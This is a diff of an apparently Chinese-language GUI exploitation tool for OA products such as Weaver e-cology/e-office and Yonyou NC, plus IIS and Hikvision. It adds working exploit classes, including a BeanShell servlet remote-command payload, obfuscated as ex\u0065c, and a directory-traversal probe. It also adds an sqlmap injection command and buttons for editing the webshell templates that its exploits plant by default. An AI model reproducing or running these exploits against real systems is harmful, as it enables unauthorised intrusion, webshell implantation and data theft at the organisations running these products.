”v0.1“

README.md

@@ -5,13 +5,15 @@
 e-cology workrelate_uploadOperation.jsp-RCE (默认写入冰蝎4.0.3aes)  
 e-cology page_uploadOperation.jsp-RCE (暂未找到案例 仅供检测poc)  
 e-cology BshServlet-RCE (可直接执行系统命令)  
-e-cology WorkflowServiceXml-RCE (shell详情见回显)  
+e-cology WorkflowServiceXml-RCE (默认写入内存马 冰蝎 3.0 beta11)  
 e-office logo_UploadFile.php-RCE (默认写入冰蝎4.0.3aes)  
 e-office10 OfficeServer.php-RCE (默认写入冰蝎4.0.3aes)  
 e-mobile_6.6 messageType.do-SQlli (sqlmap利用，暂无直接shell的exp)  
 
 用友:  
-yongyou_chajet_rce (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)  
+yongyou_chajet_RCE (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)  
+yongyou_NC_bsh.servlet.BshServlet_RCE (可直接执行系统命令)  
+yongyou_NC_NCFindWeb 目录遍历漏洞 (可查看是否存在历史遗留webshell)  
 
 中间件:  
 IIS_PUT_RCE (emm暂时没办法getshell  仅支持检测 java没有MOVE方法)  
@@ -20,10 +22,25 @@ IIS_PUT_RCE (emm暂时没办法getshell  仅支持检测 java没有MOVE方法)
 综合安防_applyCT_fastjson-RCE(仅支持检测,自行使用ladp服务利用)  
 
 ---
-工具模块:  
+## 工具模块:  
 
 文件上传指令生成  
 <img width="962" alt="微信图片_20221002223437" src="https://user-images.githubusercontent.com/100954709/193459785-24f45480-764a-4d12-9fe8-485112bf4ef1.png">  
 
 Tasklist敏感进程检测  
 <img width="962" alt="微信图片_20221002223828" src="https://user-images.githubusercontent.com/100954709/193459855-71f0e49a-c6e5-44f9-800c-e0aae7e995f5.png">
+
+---
+## 配置相关  
+
+部分漏洞使用dnslog检测  请自行修改 Apt_config/dnslog下内容  
+本工具使用CEYE.IO   只需修改为自己的地址及tokent即可  
+
+---
+## 问题反馈
+可直接提Issu 或加我wx进群交流  
+
+![my](https://user-images.githubusercontent.com/100954709/193801691-df73fec6-284a-450a-943a-09fe023bcde0.png)  
+
+
+

src/main/java/Controller/AttController.java

@@ -1,11 +1,15 @@
 package Controller;
 
 import Utilss.Kinds_Exp;
+import Utilss.shell;
 import core.Exploitlnterface;
+import javafx.event.ActionEvent;
 import javafx.fxml.FXML;
 import javafx.scene.control.*;
 import javafx.scene.input.MouseEvent;
 
+import java.io.IOException;
+
 public class AttController {
     @FXML
     private RadioButton radioButton_getshell;
@@ -31,6 +35,104 @@ public class AttController {
     @FXML
     private ChoiceBox<String> choiceBox_kinds;
 
+    @FXML
+    private Button button_jsp;
+
+    @FXML
+    private Button button_jspx;
+
+    @FXML
+    private Button button_asp;
+
+    @FXML
+    private Button button_aspx;
+
+    @FXML
+    private Button button_dnslog_token;
+
+    @FXML
+    private Button button_dnslog;
+
+    @FXML
+    private Button button_php;
+
+    @FXML
+    void clicked_jsp(MouseEvent event) {
+        Runtime run = Runtime.getRuntime();
+        //path:文件路径
+        try {
+            run.exec("notepad " + shell.Jsppath);
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+
+    @FXML
+    void clicked_jspx(MouseEvent event) {
+        Runtime run = Runtime.getRuntime();
+        //path:文件路径
+        try {
+            run.exec("notepad " + shell.Jspxpath);
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+
+    @FXML
+    void clicked_asp(MouseEvent event) {
+        Runtime run = Runtime.getRuntime();
+        //path:文件路径
+        try {
+            run.exec("notepad " + shell.Asppath);
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+
+    @FXML
+    void clicked_aspx(MouseEvent event) {
+        Runtime run = Runtime.getRuntime();
+        //path:文件路径
+        try {
+            run.exec("notepad " + shell.Aspxpath);
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+
+    @FXML
+    void clicked_php(MouseEvent event) {
+        Runtime run = Runtime.getRuntime();
+        //path:文件路径
+        try {
+            run.exec("notepad " + shell.Phppath);
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+
+    @FXML
+    void clicked_dnslog(MouseEvent event) {
+        Runtime run = Runtime.getRuntime();
+        //path:文件路径
+        try {
+            run.exec("notepad " + shell.dnspath);
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+
+    @FXML
+    void clicked_dnslog_token(MouseEvent event) {
+        Runtime run = Runtime.getRuntime();
+        //path:文件路径
+        try {
+            run.exec("notepad " + shell.dnscofpath);
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+
     @FXML
     void Att_clicked(MouseEvent event){         //ATT按钮
         //初始清空
@@ -59,7 +161,7 @@ void Att_clicked(MouseEvent event){         //ATT按钮
                     }
                 }
             }
-            textArea_attInfo.appendText("\n\n获取shell请单选 不支持批量获取shell");
+            textArea_attInfo.appendText("\n\n获取shell请单选 不支持批量getshell");
 
         }else if(vulname != null){
 
@@ -90,13 +192,15 @@ public void initialize(){
         textArea_info.appendText("\n\n<<<<<-----------------------------OA类------------------------------>>>>>");
         textArea_info.appendText("\ne-cology workrelate_uploadOperation.jsp-RCE (默认写入冰蝎4.0.3aes)");
         textArea_info.appendText("\ne-cology page_uploadOperation.jsp-RCE (暂未找到案例 仅供检测poc)");
-        textArea_info.appendText("\ne-cology WorkflowServiceXml-RCE (shell详情见回显)");
+        textArea_info.appendText("\ne-cology WorkflowServiceXml-RCE (默认写入内存马 冰蝎 3.0 beta11)");
         textArea_info.appendText("\ne-cology BshServlet-RCE (可直接执行系统命令)");
         textArea_info.appendText("\ne-office logo_UploadFile.php-RCE (默认写入冰蝎4.0.3aes)");
         textArea_info.appendText("\ne-office10 OfficeServer.php-RCE (默认写入冰蝎4.0.3aes)");
         textArea_info.appendText("\ne-mobile_6.6 messageType.do-SQlli (sqlmap利用，暂无直接shell的exp)");
 
-        textArea_info.appendText("\n\nyongyou_chajet_rce (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)");
+        textArea_info.appendText("\n\nyongyou_chajet-RCE (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)");
+        textArea_info.appendText("\nyongyou_NC_bsh.servlet.BshServlet-RCE (可直接执行系统命令)");
+        textArea_info.appendText("\nyongyou_NC_NCFindWeb 目录遍历漏洞 (可查看是否存在历史遗留webshell)");
 
         textArea_info.appendText("\n\n<<<<<---------------------------中间件---------------------------->>>>>");
         textArea_info.appendText("\nIIS_PUT_RCE (emm暂时没办法getshell  仅支持检测 java没有MOVE方法)");
@@ -114,6 +218,9 @@ public void initialize(){
         textArea_info.setWrapText(true);
         textArea_attInfo.setWrapText(true);
 
+        //适配屏幕
+        System.setProperty("prism.allowhidpi", "true");
+
         //返回kinds 下拉框内容
         choiceBox_kinds.setItems(Kinds_Exp.kinds());
 

src/main/java/Exp/OA/weaveroa/weaveroa_BshServlet.java

@@ -29,9 +29,10 @@ private Boolean att(String url,TextArea textArea){
                     , new HashMap<String, String>(),"utf-8");
             if(post.getCode() == 200 && post.getText().contains("BeanShell Test Servlet")){
                 textArea.appendText("\n ex\\u0065c(\"cmd /c dir\"); 可用");
+                textArea.appendText("\n " + url + "/weaver/bsh.servlet.BshServlet/");
                 return true;
             }else {
-                textArea.appendText("\n payload未找到 请尝试手动绕过");
+                textArea.appendText("\n 漏洞存在 命令被waf拦截 请尝试手动绕过");
                 return true;
             }
 

src/main/java/Exp/OA/weaveroa/weaveroa_eoffice10_OfficeServer.java

@@ -41,7 +41,7 @@ private Boolean att(String url,TextArea textArea,String filename,String path){
                     , "utf-8");
 
             if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
-                textArea.appendText("\n 测试文件写入 " + url + "/eoffice10/server/public/iWebOffice2015/Document/" +filename);
+                textArea.appendText("\n 测试文件写入 \n" + url + "/eoffice10/server/public/iWebOffice2015/Document/" +filename);
                 return true;
             }else {
                 textArea.appendText("\n 若txt文件写入成功则为WAF拦截 请手动复现或修改shell");

src/main/java/Exp/OA/weaveroa/weaveroa_mobile6_sqlli.java

@@ -25,8 +25,8 @@ private Boolean att(String url,TextArea textArea){
         if(response.getCode() == 200 && response.getText().contains("推送类型已存在")){
             Response response1 = HttpTools.get(url + "/messageType.do?method=create&typeName=1%27", new HashMap<String, String>(), "utf-8");
             if(response1.getCode() == 200 && response1.getText().contains("status")){
-                textArea.appendText("\n 注入存在 sqlmap: sqlmap.py -u " + url + "/messageType.do?method=create&typeName=1"
-                + " -p typeName --dbms=H2");
+                textArea.appendText("\n 注入存在 sqlmap: sqlmap.py -u \"" + url + "/messageType.do?method=create&typeName=1"
+                + "\" -p typeName --dbms=H2");
                 textArea.appendText("\n 该漏洞貌似可以注入java代码实现rce 但是木有找到合适的exp 有的话可以提供给我！");
                 return true;
             }else {

src/main/java/Exp/OA/weaveroa/weaveroa_office_UploadFile.java

@@ -39,7 +39,7 @@ private Boolean att(String url,String Path,TextArea textArea){
             System.out.println("到这了");
             System.out.println(response.getText());
             if(response.getText().contains(shell.test_payload)){
-                textArea.appendText("\n 漏洞存在 测试文件写入成功 \n 地址为："+ url + "/images/logo/logo-eoffice.php");
+                textArea.appendText("\n 漏洞存在 测试文件写入成功 \n "+ url + "/images/logo/logo-eoffice.php");
                 return true;
             }else {
                 textArea.appendText("\n 漏洞可能存在，疑似WAF拦截，请手动复现");

src/main/java/Exp/OA/weaveroa/weaveroa_workrelate_uploadOperation.java

@@ -5,7 +5,6 @@
 import Utilss.shell;
 import core.Exploitlnterface;
 import javafx.scene.control.TextArea;
-
 import java.util.HashMap;
 import java.util.regex.Matcher;
 import java.util.regex.Pattern;
@@ -70,7 +69,7 @@ private Boolean att(String url,String path,TextArea textArea,String filename){
                 Response thired = HttpTools.get(url + "/" + filename, new HashMap<String, String>(), "utf-8");
 
                 if(thired.getText().contains(shell.test_payload)){
-                    textArea.appendText("\n 漏洞存在，测试文件写入成功 地址为：" + url + "/" + filename);
+                    textArea.appendText("\n 漏洞存在，测试文件写入成功 \n " + url + "/" + filename);
                     return true;
                 }else {
                     textArea.appendText("\n 漏洞可能存在，疑似WAF拦截，请手动复现");

src/main/java/Exp/OA/yongyou/yongyou_nc_BshServlet.java

@@ -0,0 +1,44 @@
+package Exp.OA.yongyou;
+
+import Utilss.HttpTools;
+import Utilss.Response;
+import core.Exploitlnterface;
+import javafx.scene.control.TextArea;
+
+import java.util.HashMap;
+
+public class yongyou_nc_BshServlet implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        Boolean att = att(url,textArea);
+        return att;
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        textArea.appendText("\n 该漏洞已直接执行系统命令，无需getshell");
+        return false;
+    }
+
+    private Boolean att(String url,TextArea textArea){
+        Response response = HttpTools.get(url + "/servlet/~ic/bsh.servlet.BshServlet", new HashMap<String, String>(), "utf-8");
+        if(response.getCode() == 200 && response.getText().contains("BeanShell Test Servlet")){
+            textArea.appendText("\n 漏洞存在 开始测试payload");
+
+            Response post = HttpTools.post(url + "/servlet/~ic/bsh.servlet.BshServlet", "bsh.script=ex%5Cu0065c%28%22cmd+%2Fc+dir%22%29%3B"
+                    , new HashMap<String, String>(),"utf-8");
+            if(post.getCode() == 200 && post.getText().contains("BeanShell Test Servlet")){
+                textArea.appendText("\n ex\\u0065c(\"cmd /c dir\"); 可用");
+                textArea.appendText("\n " + url + "/servlet/~ic/bsh.servlet.BshServlet");
+                return true;
+            }else {
+                textArea.appendText("\n 漏洞存在 命令被waf拦截 请尝试手动绕过");
+                return true;
+            }
+
+        }else {
+            textArea.appendText("\n e-cology BshServlet-RCE-漏洞不存在 (出现误报请联系作者)");
+            return false;
+        }
+    }
+}

src/main/java/Exp/OA/yongyou/yongyou_nc_NCFindWeb.java

@@ -0,0 +1,33 @@
+package Exp.OA.yongyou;
+
+import Utilss.HttpTools;
+import Utilss.Response;
+import core.Exploitlnterface;
+import javafx.scene.control.TextArea;
+
+import java.util.HashMap;
+
+public class yongyou_nc_NCFindWeb implements Exploitlnterface{
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        Boolean att = att(url, textArea);
+        return att;
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        textArea.appendText("\n 目录遍历漏洞无法getshell，可查看是否存在历史遗留webshell");
+        return false;
+    }
+
+    private Boolean att(String url,TextArea textArea){
+        Response response = HttpTools.get(url + "/NCFindWeb?service=IPreAlertConfigService&filename=", new HashMap<String, String>(), "utf-8");
+        if(response.getCode() == 200 && response.getText().contains("Client")){
+            textArea.appendText("\n 目录遍历漏洞存在" + "\n" + url + "/NCFindWeb?service=IPreAlertConfigService&filename=");
+            return true;
+        }else {
+            textArea.appendText("\n NC_NCFindWeb-目录遍历E-漏洞不存在 (出现误报请联系作者)");
+            return false;
+        }
+    }
+}

src/main/java/Test.java

@@ -1,3 +1,4 @@
+import java.io.IOException;
 
 public class Test {
 

src/main/java/Utilss/Kinds_Exp.java

@@ -2,6 +2,8 @@
 
 import Exp.OA.weaveroa.*;
 import Exp.OA.yongyou.yongyou_chajet_upload;
+import Exp.OA.yongyou.yongyou_nc_BshServlet;
+import Exp.OA.yongyou.yongyou_nc_NCFindWeb;
 import Exp.equipment.HIKVISION.hik_applyCT_fastjson;
 import Exp.middleware.IIS.iis_put_rce;
 import core.Exploitlnterface;
@@ -77,7 +79,9 @@ public static ObservableList<String> landrayoa(){
     public static ObservableList<String> yongyouoa(){
         ArrayList<String> yongyouoa = new ArrayList<>();
         yongyouoa.add("All");
-        yongyouoa.add("chajet_upload");
+        yongyouoa.add("chajet_upload-RCE");
+        yongyouoa.add("NC_bsh.servlet.BshServlet-RCE");
+        yongyouoa.add("NC_NCFindWeb-Directory");
         ObservableList<String> observableList = FXCollections.observableArrayList(yongyouoa);
         return observableList;
     }
@@ -127,9 +131,13 @@ public static Exploitlnterface getExploit(String vulName){
             ei = new weaveroa_eoffice10_OfficeServer();
         }
 
-        else if(vulName.contains("chajet_upload")){
+        else if(vulName.contains("chajet_upload-RCE")){
             //用友
             ei = new yongyou_chajet_upload();
+        }else if(vulName.contains("NC_bsh.servlet.BshServlet-RCE")){
+            ei = new yongyou_nc_BshServlet();
+        }else if(vulName.contains("NC_NCFindWeb")){
+            ei = new yongyou_nc_NCFindWeb();
         }
 
 

src/main/resources/fxml/Att.fxml

@@ -10,9 +10,16 @@
       <ListView fx:id="listview_kinds" layoutX="14.0" layoutY="61.0" onMouseClicked="#listview_clicked" prefHeight="776.0" prefWidth="236.0" />
       <ChoiceBox fx:id="choiceBox_exp" layoutX="272.0" layoutY="13.0" prefHeight="36.0" prefWidth="236.0" />
       <TextArea fx:id="textArea_info" layoutX="263.0" layoutY="62.0" prefHeight="776.0" prefWidth="444.0" />
-      <TextField fx:id="textField_url" layoutX="731.0" layoutY="14.0" prefHeight="37.0" prefWidth="427.0" promptText="URL/PATH" />
+      <TextField fx:id="textField_url" layoutX="723.0" layoutY="14.0" prefHeight="37.0" prefWidth="435.0" promptText="URL/PATH" />
       <Button fx:id="Button_Att" layoutX="1185.0" layoutY="13.0" mnemonicParsing="false" onMouseClicked="#Att_clicked" prefHeight="35.0" prefWidth="83.0" text="ATT" />
-      <TextArea fx:id="textArea_attInfo" layoutX="731.0" layoutY="70.0" prefHeight="212.0" prefWidth="537.0" />
+      <TextArea fx:id="textArea_attInfo" layoutX="719.0" layoutY="62.0" prefHeight="334.0" prefWidth="549.0" />
       <RadioButton fx:id="radioButton_getshell" layoutX="603.0" layoutY="21.0" mnemonicParsing="false" text="GetShell" />
+      <Button fx:id="button_jsp" layoutX="719.0" layoutY="414.0" mnemonicParsing="false" onMouseClicked="#clicked_jsp" text="Jsp_shell" />
+      <Button fx:id="button_jspx" layoutX="793.0" layoutY="414.0" mnemonicParsing="false" onMouseClicked="#clicked_jspx" text="Jspx_shell" />
+      <Button fx:id="button_asp" layoutX="875.0" layoutY="414.0" mnemonicParsing="false" onMouseClicked="#clicked_asp" text="Asp_shell" />
+      <Button fx:id="button_aspx" layoutX="961.0" layoutY="414.0" mnemonicParsing="false" onMouseClicked="#clicked_aspx" text="Aspx_shell" />
+      <Button fx:id="button_php" layoutX="1049.0" layoutY="414.0" mnemonicParsing="false" onMouseClicked="#clicked_php" text="PHP_shell" />
+      <Button fx:id="button_dnslog" layoutX="719.0" layoutY="450.0" mnemonicParsing="false" onMouseClicked="#clicked_dnslog" text="Dnslog" />
+      <Button fx:id="button_dnslog_token" layoutX="788.0" layoutY="450.0" mnemonicParsing="false" onMouseClicked="#clicked_dnslog_token" text="Dnslog_token" />
    </children>
 </AnchorPane>